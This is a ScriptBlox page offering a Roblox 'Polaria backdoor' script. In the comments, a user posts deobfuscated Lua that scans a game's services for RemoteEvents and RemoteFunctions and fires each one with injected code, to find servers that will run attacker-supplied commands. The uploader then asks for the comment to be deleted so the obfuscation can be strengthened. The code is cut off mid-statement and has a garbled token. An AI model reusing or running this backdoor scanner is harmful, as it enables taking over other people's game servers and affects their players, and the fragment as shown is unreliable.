ScriptBlox is undergoing maintenance, so downtime is possible. Sorry for the inconvenience!
Universal Script 📌
9.7k Views

Polaria backdoor

Universal Script 📌Uploaded by
9 months ago
Please login to perform these actions:

Description

Basic backdoor (BASIC and now OPEN SOURCE!!) hope you like

View Raw
Edited By: Basicexploitdev Download


Comments
4
User profile picture
Basicexploitdev 9 months ago
Looking for testers to review btw for supported game links in comments and desc of last script https://scriptblox.com/script/Universal-Script-Backdoor-scanner-custom-50367
Basicexploitdev's profile pictureBasicexploitdevLooking for testers to review btw for supported ga...
User profile picture
Intiha 9 months ago
@Basicexploitdev i deobfuscated this: print("Chaos Backdoor // Starting automatic scan and execution.") local function debug(msg) -- This debug function is fine, we'll leave it as is. end local AcquiredRemote = nil local RemoteList = {} local IsAcquiring = true local testModelName = "ZzXyYyZz" -- A consistent, hard-coded name. local scanAttempts = 0 local maxScanAttempts = 10 -- Let's try 10 times just to be sure,that we find them for you UwU while AcquiredRemote == nil and scanAttempts < maxScanAttempts do scanAttempts = scanAttempts + 1 warn('ChaosBackdoor // Attempt ' .. scanAttempts .. ' of ' .. maxScanAttempts .. '') -- Clear the list for a new scan attempt RemoteList = {} -- Focus on common locations where malicious remotes are hidden. local locationsToScan = { game:GetService("Workspace"), game:GetService("Players"), game:GetService("ReplicatedStorage"), game:GetService("ServerScriptService") } for _, location in ipairs(locationsToScan) do for _, v in pairs(location:GetDescendants()) do if v:IsA("RemoteEvent") or v:IsA("RemoteFunction") then debug('Getting '..v.Cl*Name..' "'..v.Name..'" into RemoteList.') table.insert(RemoteList, v) end end end for a, b in pairs(RemoteList) do if AcquiredRemote == nil then print("ChaosBackdoor // Checking "..b.Cl*Name..' "'..b.Name..'".') local testCode = 'Instance.new("Model", workspace).Name="'..testModelName..'"' if b.Parent ~= game:GetService('RobloxReplicatedStorage') then if b:IsA('RemoteEvent') then debug('Fired') b:FireServer(testCode) elseif b:IsA
Intiha's profile pictureIntiha@Basicexploitdev i deobfuscated this: print("Chao...
User profile picture
Basicexploitdev 9 months ago
@Intiha stop delete the comment pls i will now impove obfuscation and update
User profile picture
idk230thanos 2 months ago
I love this script thanks
Please Login to add a comment.